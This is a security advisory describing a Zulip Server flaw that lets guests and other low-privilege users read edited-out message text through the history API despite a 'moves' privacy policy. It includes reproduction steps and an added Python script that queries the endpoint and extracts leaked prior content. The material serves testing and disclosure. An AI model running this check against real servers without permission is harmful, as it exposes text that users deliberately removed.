Zulip Server Message Edit History Leakage Vulnerability

Vulnerability

A vulnerability in Zulip Server prior to version 12.0 allows low-privilege users to retrieve the prior content of edited messages through the API, contrary to the realm's configured privacy policy. When the message edit history visibility policy is set to 'moves', only channel and topic moves are meant to be visible in a message's history, yet the API still returns the historical content values, so text that an author deliberately edited out can be recovered by any user who can read the message.

Impact

Exploitation of this vulnerability gives a low-privilege user, including a guest, access to sensitive text that another user edited out of a message, violating the privacy expectation that the 'moves' edit history policy was configured to enforce.

Reproduction

To reproduce this vulnerability, set the message edit history visibility policy to 'moves' in a Zulip realm. Then have a user with owner privileges edit the content of a message. A low-privilege user, such as a guest who can read the message, then calls the '/api/v1/messages/{id}/history' endpoint and receives the original content that was edited away, even though the policy is intended to expose only channel and topic moves.
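The following is an added example, not part of the original advisory and not Zulip's own code. It shows how a tester would check the response of the history endpoint above from a low-privilege account: any entry whose prev_content differs from content is a content edit rather than a move, and a server enforcing the 'moves' policy should not be revealing it. The response layout (a "message_history" list whose entries carry "content", "prev_content", "topic", "prev_topic", "user_id" and "timestamp") follows Zulip's documented API; the site, account and message id in the fetch helper are placeholders, and the sample response is constructed here for the offline check.

```python
"""Check whether GET /api/v1/messages/{id}/history discloses pre-edit content.

Added example, not Zulip project code. Assumes the documented response shape
{"message_history": [...]} and uses placeholder credentials for the live call.
"""
import base64
import json
import urllib.request


def content_edits(history):
    """Return history entries whose text changed.

    A move (channel/topic change) leaves the text unchanged, so an entry where
    prev_content is present and differs from content is a content edit, which
    the 'moves' policy is supposed to hide from users without history access.
    """
    leaked = []
    for entry in history.get("message_history", []):
        prev = entry.get("prev_content")
        if prev is not None and prev != entry.get("content"):
            leaked.append({
                "timestamp": entry.get("timestamp"),
                "editor_user_id": entry.get("user_id"),
                "edited_out": prev,
                "replaced_with": entry.get("content"),
            })
    return leaked


def leaks_edited_text(history):
    """True if the response exposes text that an edit removed."""
    return bool(content_edits(history))


def fetch_history(site, email, api_key, message_id):
    """Fetch the history as the given (low-privilege) account using Zulip's
    email:api_key basic auth. Network-only; not used by the offline check."""
    url = f"{site.rstrip('/')}/api/v1/messages/{int(message_id)}/history"
    token = base64.b64encode(f"{email}:{api_key}".encode()).decode()
    req = urllib.request.Request(url, headers={"Authorization": f"Basic {token}"})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return json.load(resp)


# Constructed sample response: the author (user 8) first edited the text to
# remove a secret, then moved the message to another topic. Under a 'moves'
# policy a guest should learn about the topic move only.
SAMPLE_HISTORY = {
    "result": "success",
    "msg": "",
    "message_history": [
        {"timestamp": 1700000000, "user_id": 8, "topic": "planning",
         "content": "Password for the staging box is hunter2",
         "rendered_content": "<p>Password for the staging box is hunter2</p>"},
        {"timestamp": 1700000060, "user_id": 8, "topic": "planning",
         "prev_content": "Password for the staging box is hunter2",
         "content": "(credentials removed, ask in #ops)",
         "prev_rendered_content": "<p>Password for the staging box is hunter2</p>",
         "rendered_content": "<p>(credentials removed, ask in #ops)</p>"},
        {"timestamp": 1700000120, "user_id": 8,
         "prev_topic": "planning", "topic": "ops",
         "content": "(credentials removed, ask in #ops)",
         "rendered_content": "<p>(credentials removed, ask in #ops)</p>"},
    ],
}


if __name__ == "__main__":
    # Offline demonstration on the constructed response. To test a live
    # server, replace this with:
    #   history = fetch_history("https://zulip.example.com",
    #                           "guest@example.com", "API_KEY", 12345)
    for leak in content_edits(SAMPLE_HISTORY):
        print(f"edited-out text visible (edit at {leak['timestamp']}): "
              f"{leak['edited_out']!r}")
```

Run it as a guest against a message that an owner edited after the realm policy was set to 'moves': on an affected server the edit at timestamp 1700000060 style entry comes back with the removed text, on a fixed server nothing that differs between prev_content and content should appear in the response.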

Remediation

Administrators should upgrade to Zulip Server version 12.0 or later, where this vulnerability has been fixed. Until the upgrade is applied, note that setting the policy to 'moves' does not prevent disclosure of edited-out content.

Added: May 12, 2026, 5:41 PM
Updated: May 12, 2026, 5:41 PM

Vulnerability Rating

Custom Algorithm

spread: 3.1
impact: 0.6
exploitability: 6.6
remediation: 7.7
relevance: 8.1
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.